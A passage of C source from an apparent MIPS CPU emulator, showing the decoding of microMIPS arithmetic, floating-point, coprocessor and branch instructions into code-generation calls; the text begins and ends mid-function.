(ctx->opcode >> 14) & 3, rs, rt); break; case MSUBU_ACC: gen_muldiv(ctx, OPC_MSUBU, (ctx->opcode >> 14) & 3, rs, rt); break; default: goto pool32axf_invalid; } break; case 0x32: switch (minor & 3) { case MULT_ACC: gen_muldiv(ctx, OPC_MULT, (ctx->opcode >> 14) & 3, rs, rt); break; case MULTU_ACC: gen_muldiv(ctx, OPC_MULTU, (ctx->opcode >> 14) & 3, rs, rt); break; default: goto pool32axf_invalid; } break; case 0x2c: switch (minor) { case BITSWAP: check_insn(ctx, ISA_MIPS32R6); gen_bitswap(ctx, OPC_BITSWAP, rs, rt); break; case SEB: gen_bshfl(ctx, OPC_SEB, rs, rt); break; case SEH: gen_bshfl(ctx, OPC_SEH, rs, rt); break; case CLO: mips32_op = OPC_CLO; goto do_cl; case CLZ: mips32_op = OPC_CLZ; do_cl: check_insn(ctx, ISA_MIPS32); gen_cl(ctx, mips32_op, rt, rs); break; case RDHWR: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_rdhwr(ctx, rt, rs, 0); break; case WSBH: gen_bshfl(ctx, OPC_WSBH, rs, rt); break; case MULT: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MULT; goto do_mul; case MULTU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MULTU; goto do_mul; case DIV: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_DIV; goto do_div; case DIVU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_DIVU; goto do_div; do_div: check_insn(ctx, ISA_MIPS32); gen_muldiv(ctx, mips32_op, 0, rs, rt); break; case MADD: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADD; goto do_mul; case MADDU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADDU; goto do_mul; case MSUB: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUB; goto do_mul; case MSUBU: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUBU; do_mul: check_insn(ctx, ISA_MIPS32); gen_muldiv(ctx, mips32_op, 0, rs, rt); break; default: goto pool32axf_invalid; } break; case 0x34: switch (minor) { case MFC2: case MTC2: case MFHC2: case MTHC2: case CFC2: case CTC2: generate_exception_err(ctx, EXCP_CpU, 2); break; default: goto pool32axf_invalid; } break; case 0x3c: switch (minor) { case JALR: /* JALRC */ case JALR_HB: /* JALRC_HB */ if (ctx->insn_flags & ISA_MIPS32R6) { /* JALRC, JALRC_HB */ gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 0); } else { /* JALR, JALR_HB */ gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 4); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; } break; case JALRS: case JALRS_HB: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_compute_branch(ctx, OPC_JALR, 4, rs, rt, 0, 2); ctx->hflags |= MIPS_HFLAG_BDS_STRICT; break; default: goto pool32axf_invalid; } break; case 0x05: switch (minor) { case RDPGPR: check_cp0_enabled(ctx); check_insn(ctx, ISA_MIPS32R2); gen_load_srsgpr(tcg_ctx, rs, rt); break; case WRPGPR: check_cp0_enabled(ctx); check_insn(ctx, ISA_MIPS32R2); gen_store_srsgpr(tcg_ctx, rs, rt); break; default: goto pool32axf_invalid; } break; case 0x0d: switch (minor) { case TLBP: mips32_op = OPC_TLBP; goto do_cp0; case TLBR: mips32_op = OPC_TLBR; goto do_cp0; case TLBWI: mips32_op = OPC_TLBWI; goto do_cp0; case TLBWR: mips32_op = OPC_TLBWR; goto do_cp0; case TLBINV: mips32_op = OPC_TLBINV; goto do_cp0; case TLBINVF: mips32_op = OPC_TLBINVF; goto do_cp0; case WAIT: mips32_op = OPC_WAIT; goto do_cp0; case DERET: mips32_op = OPC_DERET; goto do_cp0; case ERET: mips32_op = OPC_ERET; do_cp0: gen_cp0(env, ctx, mips32_op, rt, rs); break; default: goto pool32axf_invalid; } break; case 0x1d: switch (minor) { case DI: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); save_cpu_state(ctx, 1); gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rs); /* * Stop translation as we may have switched the execution * mode. */ ctx->base.is_jmp = DISAS_STOP; tcg_temp_free(tcg_ctx, t0); } break; case EI: check_cp0_enabled(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); save_cpu_state(ctx, 1); gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rs); /* * DISAS_STOP isn't sufficient, we need to ensure we break out * of translated code to check for pending interrupts. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; tcg_temp_free(tcg_ctx, t0); } break; default: goto pool32axf_invalid; } break; case 0x2d: switch (minor) { case SYNC: gen_sync(tcg_ctx, extract32(ctx->opcode, 16, 5)); break; case SYSCALL: generate_exception_end(ctx, EXCP_SYSCALL); break; case SDBBP: if (is_uhi(extract32(ctx->opcode, 16, 10))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { check_insn(ctx, ISA_MIPS32); if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception_end(ctx, EXCP_RI); } else { generate_exception_end(ctx, EXCP_DBp); } } break; default: goto pool32axf_invalid; } break; case 0x01: switch (minor & 3) { case MFHI_ACC: gen_HILO(ctx, OPC_MFHI, minor >> 2, rs); break; case MFLO_ACC: gen_HILO(ctx, OPC_MFLO, minor >> 2, rs); break; case MTHI_ACC: gen_HILO(ctx, OPC_MTHI, minor >> 2, rs); break; case MTLO_ACC: gen_HILO(ctx, OPC_MTLO, minor >> 2, rs); break; default: goto pool32axf_invalid; } break; case 0x35: check_insn_opc_removed(ctx, ISA_MIPS32R6); switch (minor) { case MFHI32: gen_HILO(ctx, OPC_MFHI, 0, rs); break; case MFLO32: gen_HILO(ctx, OPC_MFLO, 0, rs); break; case MTHI32: gen_HILO(ctx, OPC_MTHI, 0, rs); break; case MTLO32: gen_HILO(ctx, OPC_MTLO, 0, rs); break; default: goto pool32axf_invalid; } break; default: pool32axf_invalid: MIPS_INVAL("pool32axf"); generate_exception_end(ctx, EXCP_RI); break; } } /* * Values for microMIPS fmt field. Variable-width, depending on which * formats the instruction supports. */ enum { FMT_SD_S = 0, FMT_SD_D = 1, FMT_SDPS_S = 0, FMT_SDPS_D = 1, FMT_SDPS_PS = 2, FMT_SWL_S = 0, FMT_SWL_W = 1, FMT_SWL_L = 2, FMT_DWL_D = 0, FMT_DWL_W = 1, FMT_DWL_L = 2 }; static void gen_pool32fxf(DisasContext *ctx, int rt, int rs) { int extension = (ctx->opcode >> 6) & 0x3ff; uint32_t mips32_op; #define FLOAT_1BIT_FMT(opc, fmt) ((fmt << 8) | opc) #define FLOAT_2BIT_FMT(opc, fmt) ((fmt << 7) | opc) #define COND_FLOAT_MOV(opc, cond) ((cond << 7) | opc) switch (extension) { case FLOAT_1BIT_FMT(CFC1, 0): mips32_op = OPC_CFC1; goto do_cp1; case FLOAT_1BIT_FMT(CTC1, 0): mips32_op = OPC_CTC1; goto do_cp1; case FLOAT_1BIT_FMT(MFC1, 0): mips32_op = OPC_MFC1; goto do_cp1; case FLOAT_1BIT_FMT(MTC1, 0): mips32_op = OPC_MTC1; goto do_cp1; case FLOAT_1BIT_FMT(MFHC1, 0): mips32_op = OPC_MFHC1; goto do_cp1; case FLOAT_1BIT_FMT(MTHC1, 0): mips32_op = OPC_MTHC1; do_cp1: gen_cp1(ctx, mips32_op, rt, rs); break; /* Reciprocal square root */ case FLOAT_1BIT_FMT(RSQRT_FMT, FMT_SD_S): mips32_op = OPC_RSQRT_S; goto do_unaryfp; case FLOAT_1BIT_FMT(RSQRT_FMT, FMT_SD_D): mips32_op = OPC_RSQRT_D; goto do_unaryfp; /* Square root */ case FLOAT_1BIT_FMT(SQRT_FMT, FMT_SD_S): mips32_op = OPC_SQRT_S; goto do_unaryfp; case FLOAT_1BIT_FMT(SQRT_FMT, FMT_SD_D): mips32_op = OPC_SQRT_D; goto do_unaryfp; /* Reciprocal */ case FLOAT_1BIT_FMT(RECIP_FMT, FMT_SD_S): mips32_op = OPC_RECIP_S; goto do_unaryfp; case FLOAT_1BIT_FMT(RECIP_FMT, FMT_SD_D): mips32_op = OPC_RECIP_D; goto do_unaryfp; /* Floor */ case FLOAT_1BIT_FMT(FLOOR_L, FMT_SD_S): mips32_op = OPC_FLOOR_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(FLOOR_L, FMT_SD_D): mips32_op = OPC_FLOOR_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(FLOOR_W, FMT_SD_S): mips32_op = OPC_FLOOR_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(FLOOR_W, FMT_SD_D): mips32_op = OPC_FLOOR_W_D; goto do_unaryfp; /* Ceiling */ case FLOAT_1BIT_FMT(CEIL_L, FMT_SD_S): mips32_op = OPC_CEIL_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(CEIL_L, FMT_SD_D): mips32_op = OPC_CEIL_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(CEIL_W, FMT_SD_S): mips32_op = OPC_CEIL_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(CEIL_W, FMT_SD_D): mips32_op = OPC_CEIL_W_D; goto do_unaryfp; /* Truncation */ case FLOAT_1BIT_FMT(TRUNC_L, FMT_SD_S): mips32_op = OPC_TRUNC_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(TRUNC_L, FMT_SD_D): mips32_op = OPC_TRUNC_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(TRUNC_W, FMT_SD_S): mips32_op = OPC_TRUNC_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(TRUNC_W, FMT_SD_D): mips32_op = OPC_TRUNC_W_D; goto do_unaryfp; /* Round */ case FLOAT_1BIT_FMT(ROUND_L, FMT_SD_S): mips32_op = OPC_ROUND_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(ROUND_L, FMT_SD_D): mips32_op = OPC_ROUND_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(ROUND_W, FMT_SD_S): mips32_op = OPC_ROUND_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(ROUND_W, FMT_SD_D): mips32_op = OPC_ROUND_W_D; goto do_unaryfp; /* Integer to floating-point conversion */ case FLOAT_1BIT_FMT(CVT_L, FMT_SD_S): mips32_op = OPC_CVT_L_S; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_L, FMT_SD_D): mips32_op = OPC_CVT_L_D; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_W, FMT_SD_S): mips32_op = OPC_CVT_W_S; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_W, FMT_SD_D): mips32_op = OPC_CVT_W_D; goto do_unaryfp; /* Paired-foo conversions */ case FLOAT_1BIT_FMT(CVT_S_PL, 0): mips32_op = OPC_CVT_S_PL; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_S_PU, 0): mips32_op = OPC_CVT_S_PU; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_PW_PS, 0): mips32_op = OPC_CVT_PW_PS; goto do_unaryfp; case FLOAT_1BIT_FMT(CVT_PS_PW, 0): mips32_op = OPC_CVT_PS_PW; goto do_unaryfp; /* Floating-point moves */ case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_S): mips32_op = OPC_MOV_S; goto do_unaryfp; case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_D): mips32_op = OPC_MOV_D; goto do_unaryfp; case FLOAT_2BIT_FMT(MOV_FMT, FMT_SDPS_PS): mips32_op = OPC_MOV_PS; goto do_unaryfp; /* Absolute value */ case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_S): mips32_op = OPC_ABS_S; goto do_unaryfp; case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_D): mips32_op = OPC_ABS_D; goto do_unaryfp; case FLOAT_2BIT_FMT(ABS_FMT, FMT_SDPS_PS): mips32_op = OPC_ABS_PS; goto do_unaryfp; /* Negation */ case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_S): mips32_op = OPC_NEG_S; goto do_unaryfp; case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_D): mips32_op = OPC_NEG_D; goto do_unaryfp; case FLOAT_2BIT_FMT(NEG_FMT, FMT_SDPS_PS): mips32_op = OPC_NEG_PS; goto do_unaryfp; /* Reciprocal square root step */ case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_S): mips32_op = OPC_RSQRT1_S; goto do_unaryfp; case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_D): mips32_op = OPC_RSQRT1_D; goto do_unaryfp; case FLOAT_2BIT_FMT(RSQRT1_FMT, FMT_SDPS_PS): mips32_op = OPC_RSQRT1_PS; goto do_unaryfp; /* Reciprocal step */ case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_S): mips32_op = OPC_RECIP1_S; goto do_unaryfp; case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_D): mips32_op = OPC_RECIP1_S; goto do_unaryfp; case FLOAT_2BIT_FMT(RECIP1_FMT, FMT_SDPS_PS): mips32_op = OPC_RECIP1_PS; goto do_unaryfp; /* Conversions from double */ case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_S): mips32_op = OPC_CVT_D_S; goto do_unaryfp; case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_W): mips32_op = OPC_CVT_D_W; goto do_unaryfp; case FLOAT_2BIT_FMT(CVT_D, FMT_SWL_L): mips32_op = OPC_CVT_D_L; goto do_unaryfp; /* Conversions from single */ case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_D): mips32_op = OPC_CVT_S_D; goto do_unaryfp; case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_W): mips32_op = OPC_CVT_S_W; goto do_unaryfp; case FLOAT_2BIT_FMT(CVT_S, FMT_DWL_L): mips32_op = OPC_CVT_S_L; do_unaryfp: gen_farith(ctx, mips32_op, -1, rs, rt, 0); break; /* Conditional moves on floating-point codes */ case COND_FLOAT_MOV(MOVT, 0): case COND_FLOAT_MOV(MOVT, 1): case COND_FLOAT_MOV(MOVT, 2): case COND_FLOAT_MOV(MOVT, 3): case COND_FLOAT_MOV(MOVT, 4): case COND_FLOAT_MOV(MOVT, 5): case COND_FLOAT_MOV(MOVT, 6): case COND_FLOAT_MOV(MOVT, 7): check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_movci(ctx, rt, rs, (ctx->opcode >> 13) & 0x7, 1); break; case COND_FLOAT_MOV(MOVF, 0): case COND_FLOAT_MOV(MOVF, 1): case COND_FLOAT_MOV(MOVF, 2): case COND_FLOAT_MOV(MOVF, 3): case COND_FLOAT_MOV(MOVF, 4): case COND_FLOAT_MOV(MOVF, 5): case COND_FLOAT_MOV(MOVF, 6): case COND_FLOAT_MOV(MOVF, 7): check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_movci(ctx, rt, rs, (ctx->opcode >> 13) & 0x7, 0); break; default: MIPS_INVAL("pool32fxf"); generate_exception_end(ctx, EXCP_RI); break; } } static void decode_micromips32_opc(CPUMIPSState *env, DisasContext *ctx) { int32_t offset; uint16_t insn; int rt, rs, rd, rr; int16_t imm; uint32_t op, minor, minor2, mips32_op; uint32_t cond, fmt, cc; insn = cpu_lduw_code(env, ctx->base.pc_next + 2); ctx->opcode = (ctx->opcode << 16) | insn; rt = (ctx->opcode >> 21) & 0x1f; rs = (ctx->opcode >> 16) & 0x1f; rd = (ctx->opcode >> 11) & 0x1f; rr = (ctx->opcode >> 6) & 0x1f; imm = (int16_t) ctx->opcode; op = (ctx->opcode >> 26) & 0x3f; switch (op) { case POOL32A: minor = ctx->opcode & 0x3f; switch (minor) { case 0x00: minor = (ctx->opcode >> 6) & 0xf; switch (minor) { case SLL32: mips32_op = OPC_SLL; goto do_shifti; case SRA: mips32_op = OPC_SRA; goto do_shifti; case SRL32: mips32_op = OPC_SRL; goto do_shifti; case ROTR: mips32_op = OPC_ROTR; do_shifti: gen_shift_imm(ctx, mips32_op, rt, rs, rd); break; case SELEQZ: check_insn(ctx, ISA_MIPS32R6); gen_cond_move(ctx, OPC_SELEQZ, rd, rs, rt); break; case SELNEZ: check_insn(ctx, ISA_MIPS32R6); gen_cond_move(ctx, OPC_SELNEZ, rd, rs, rt); break; case R6_RDHWR: check_insn(ctx, ISA_MIPS32R6); gen_rdhwr(ctx, rt, rs, extract32(ctx->opcode, 11, 3)); break; default: goto pool32a_invalid; } break; case 0x10: minor = (ctx->opcode >> 6) & 0xf; switch (minor) { /* Arithmetic */ case ADD: mips32_op = OPC_ADD; goto do_arith; case ADDU32: mips32_op = OPC_ADDU; goto do_arith; case SUB: mips32_op = OPC_SUB; goto do_arith; case SUBU32: mips32_op = OPC_SUBU; goto do_arith; case MUL: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MUL; do_arith: gen_arith(ctx, mips32_op, rd, rs, rt); break; /* Shifts */ case SLLV: mips32_op = OPC_SLLV; goto do_shift; case SRLV: mips32_op = OPC_SRLV; goto do_shift; case SRAV: mips32_op = OPC_SRAV; goto do_shift; case ROTRV: mips32_op = OPC_ROTRV; do_shift: gen_shift(ctx, mips32_op, rd, rs, rt); break; /* Logical operations */ case AND: mips32_op = OPC_AND; goto do_logic; case OR32: mips32_op = OPC_OR; goto do_logic; case NOR: mips32_op = OPC_NOR; goto do_logic; case XOR32: mips32_op = OPC_XOR; do_logic: gen_logic(ctx, mips32_op, rd, rs, rt); break; /* Set less than */ case SLT: mips32_op = OPC_SLT; goto do_slt; case SLTU: mips32_op = OPC_SLTU; do_slt: gen_slt(ctx, mips32_op, rd, rs, rt); break; default: goto pool32a_invalid; } break; case 0x18: minor = (ctx->opcode >> 6) & 0xf; switch (minor) { /* Conditional moves */ case MOVN: /* MUL */ if (ctx->insn_flags & ISA_MIPS32R6) { /* MUL */ gen_r6_muldiv(ctx, R6_OPC_MUL, rd, rs, rt); } else { /* MOVN */ gen_cond_move(ctx, OPC_MOVN, rd, rs, rt); } break; case MOVZ: /* MUH */ if (ctx->insn_flags & ISA_MIPS32R6) { /* MUH */ gen_r6_muldiv(ctx, R6_OPC_MUH, rd, rs, rt); } else { /* MOVZ */ gen_cond_move(ctx, OPC_MOVZ, rd, rs, rt); } break; case MULU: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_MULU, rd, rs, rt); break; case MUHU: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_MUHU, rd, rs, rt); break; case LWXS: /* DIV */ if (ctx->insn_flags & ISA_MIPS32R6) { /* DIV */ gen_r6_muldiv(ctx, R6_OPC_DIV, rd, rs, rt); } else { /* LWXS */ gen_ldxs(ctx, rs, rt, rd); } break; case MOD: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_MOD, rd, rs, rt); break; case R6_DIVU: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_DIVU, rd, rs, rt); break; case MODU: check_insn(ctx, ISA_MIPS32R6); gen_r6_muldiv(ctx, R6_OPC_MODU, rd, rs, rt); break; default: goto pool32a_invalid; } break; case INS: gen_bitops(ctx, OPC_INS, rt, rs, rr, rd); return; case LSA: check_insn(ctx, ISA_MIPS32R6); gen_lsa(ctx, OPC_LSA, rd, rs, rt, extract32(ctx->opcode, 9, 2)); break; case ALIGN: check_insn(ctx, ISA_MIPS32R6); gen_align(ctx, 32, rd, rs, rt, extract32(ctx->opcode, 9, 2)); break; case EXT: gen_bitops(ctx, OPC_EXT, rt, rs, rr, rd); return; case POOL32AXF: gen_pool32axf(env, ctx, rt, rs); break; case BREAK32: generate_exception_end(ctx, EXCP_BREAK); break; case SIGRIE: check_insn(ctx, ISA_MIPS32R6); generate_exception_end(ctx, EXCP_RI); break; default: pool32a_invalid: MIPS_INVAL("pool32a"); generate_exception_end(ctx, EXCP_RI); break; } break; case POOL32B: minor = (ctx->opcode >> 12) & 0xf; switch (minor) { case CACHE: check_cp0_enabled(ctx); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, imm); } break; case LWC2: case SWC2: /* COP2: Not implemented. */ generate_exception_err(ctx, EXCP_CpU, 2); break; #ifdef TARGET_MIPS64 case LDP: case SDP: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); #endif /* fall through */ case LWP: case SWP: gen_ldst_pair(ctx, minor, rt, rs, SIMM(ctx->opcode, 0, 12)); break; #ifdef TARGET_MIPS64 case LDM: case SDM: check_insn(ctx, ISA_MIPS3); check_mips_64(ctx); #endif /* fall through */ case LWM32: case SWM32: gen_ldst_multiple(ctx, minor, rt, rs, SIMM(ctx->opcode, 0, 12)); break; default: MIPS_INVAL("pool32b"); generate_exception_end(ctx, EXCP_RI); break; } break; case POOL32F: if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { minor = ctx->opcode & 0x3f; check_cp1_enabled(ctx); switch (minor) { case ALNV_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_ALNV_PS; goto do_madd; case MADD_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADD_S; goto do_madd; case MADD_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADD_D; goto do_madd; case MADD_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MADD_PS; goto do_madd; case MSUB_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUB_S; goto do_madd; case MSUB_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUB_D; goto do_madd; case MSUB_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_MSUB_PS; goto do_madd; case NMADD_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMADD_S; goto do_madd; case NMADD_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMADD_D; goto do_madd; case NMADD_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMADD_PS; goto do_madd; case NMSUB_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMSUB_S; goto do_madd; case NMSUB_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMSUB_D; goto do_madd; case NMSUB_PS: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_NMSUB_PS; do_madd: gen_flt3_arith(ctx, mips32_op, rd, rr, rs, rt); break; case CABS_COND_FMT: check_insn_opc_removed(ctx, ISA_MIPS32R6); cond = (ctx->opcode >> 6) & 0xf; cc = (ctx->opcode >> 13) & 0x7; fmt = (ctx->opcode >> 10) & 0x3; switch (fmt) { case 0x0: gen_cmpabs_s(ctx, cond, rt, rs, cc); break; case 0x1: gen_cmpabs_d(ctx, cond, rt, rs, cc); break; case 0x2: gen_cmpabs_ps(ctx, cond, rt, rs, cc); break; default: goto pool32f_invalid; } break; case C_COND_FMT: check_insn_opc_removed(ctx, ISA_MIPS32R6); cond = (ctx->opcode >> 6) & 0xf; cc = (ctx->opcode >> 13) & 0x7; fmt = (ctx->opcode >> 10) & 0x3; switch (fmt) { case 0x0: gen_cmp_s(ctx, cond, rt, rs, cc); break; case 0x1: gen_cmp_d(ctx, cond, rt, rs, cc); break; case 0x2: gen_cmp_ps(ctx, cond, rt, rs, cc); break; default: goto pool32f_invalid; } break; case CMP_CONDN_S: check_insn(ctx, ISA_MIPS32R6); gen_r6_cmp_s(ctx, (ctx->opcode >> 6) & 0x1f, rt, rs, rd); break; case CMP_CONDN_D: check_insn(ctx, ISA_MIPS32R6); gen_r6_cmp_d(ctx, (ctx->opcode >> 6) & 0x1f, rt, rs, rd); break; case POOL32FXF: gen_pool32fxf(ctx, rt, rs); break; case 0x00: /* PLL foo */ switch ((ctx->opcode >> 6) & 0x7) { case PLL_PS: mips32_op = OPC_PLL_PS; goto do_ps; case PLU_PS: mips32_op = OPC_PLU_PS; goto do_ps; case PUL_PS: mips32_op = OPC_PUL_PS; goto do_ps; case PUU_PS: mips32_op = OPC_PUU_PS; goto do_ps; case CVT_PS_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_CVT_PS_S; do_ps: gen_farith(ctx, mips32_op, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case MIN_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_farith(ctx, OPC_MIN_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MIN_D, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case 0x08: /* [LS][WDU]XC1 */ switch ((ctx->opcode >> 6) & 0x7) { case LWXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LWXC1; goto do_ldst_cp1; case SWXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SWXC1; goto do_ldst_cp1; case LDXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LDXC1; goto do_ldst_cp1; case SDXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SDXC1; goto do_ldst_cp1; case LUXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_LUXC1; goto do_ldst_cp1; case SUXC1: check_insn_opc_removed(ctx, ISA_MIPS32R6); mips32_op = OPC_SUXC1; do_ldst_cp1: gen_flt3_ldst(ctx, mips32_op, rd, rd, rt, rs); break; default: goto pool32f_invalid; } break; case MAX_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_farith(ctx, OPC_MAX_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MAX_D, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case 0x18: /* 3D insns */ check_insn_opc_removed(ctx, ISA_MIPS32R6); fmt = (ctx->opcode >> 9) & 0x3; switch ((ctx->opcode >> 6) & 0x7) { case RSQRT2_FMT: switch (fmt) { case FMT_SDPS_S: mips32_op = OPC_RSQRT2_S; goto do_3d; case FMT_SDPS_D: mips32_op = OPC_RSQRT2_D; goto do_3d; case FMT_SDPS_PS: mips32_op = OPC_RSQRT2_PS; goto do_3d; default: goto pool32f_invalid; } break; case RECIP2_FMT: switch (fmt) { case FMT_SDPS_S: mips32_op = OPC_RECIP2_S; goto do_3d; case FMT_SDPS_D: mips32_op = OPC_RECIP2_D; goto do_3d; case FMT_SDPS_PS: mips32_op = OPC_RECIP2_PS; goto do_3d; default: goto pool32f_invalid; } break; case ADDR_PS: mips32_op = OPC_ADDR_PS; goto do_3d; case MULR_PS: mips32_op = OPC_MULR_PS; do_3d: gen_farith(ctx, mips32_op, rt, rs, rd, 0); break; default: goto pool32f_invalid; } break; case 0x20: /* MOV[FT].fmt, PREFX, RINT.fmt, CLASS.fmt*/ cc = (ctx->opcode >> 13) & 0x7; fmt = (ctx->opcode >> 9) & 0x3; switch ((ctx->opcode >> 6) & 0x7) { case MOVF_FMT: /* RINT_FMT */ if (ctx->insn_flags & ISA_MIPS32R6) { /* RINT_FMT */ switch (fmt) { case FMT_SDPS_S: gen_farith(ctx, OPC_RINT_S, 0, rt, rs, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_RINT_D, 0, rt, rs, 0); break; default: goto pool32f_invalid; } } else { /* MOVF_FMT */ switch (fmt) { case FMT_SDPS_S: gen_movcf_s(ctx, rs, rt, cc, 0); break; case FMT_SDPS_D: gen_movcf_d(ctx, rs, rt, cc, 0); break; case FMT_SDPS_PS: check_ps(ctx); gen_movcf_ps(ctx, rs, rt, cc, 0); break; default: goto pool32f_invalid; } } break; case MOVT_FMT: /* CLASS_FMT */ if (ctx->insn_flags & ISA_MIPS32R6) { /* CLASS_FMT */ switch (fmt) { case FMT_SDPS_S: gen_farith(ctx, OPC_CLASS_S, 0, rt, rs, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_CLASS_D, 0, rt, rs, 0); break; default: goto pool32f_invalid; } } else { /* MOVT_FMT */ switch (fmt) { case FMT_SDPS_S: gen_movcf_s(ctx, rs, rt, cc, 1); break; case FMT_SDPS_D: gen_movcf_d(ctx, rs, rt, cc, 1); break; case FMT_SDPS_PS: check_ps(ctx); gen_movcf_ps(ctx, rs, rt, cc, 1); break; default: goto pool32f_invalid; } } break; case PREFX: check_insn_opc_removed(ctx, ISA_MIPS32R6); break; default: goto pool32f_invalid; } break; #define FINSN_3ARG_SDPS(prfx) \ switch ((ctx->opcode >> 8) & 0x3) { \ case FMT_SDPS_S: \ mips32_op = OPC_##prfx##_S; \ goto do_fpop; \ case FMT_SDPS_D: \ mips32_op = OPC_##prfx##_D; \ goto do_fpop; \ case FMT_SDPS_PS: \ check_ps(ctx); \ mips32_op = OPC_##prfx##_PS; \ goto do_fpop; \ default: \ goto pool32f_invalid; \ } case MINA_FMT: check_insn(ctx, ISA_MIPS32R6); switch ((ctx->opcode >> 9) & 0x3) { case FMT_SDPS_S: gen_farith(ctx, OPC_MINA_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MINA_D, rt, rs, rd, 0); break; default: goto 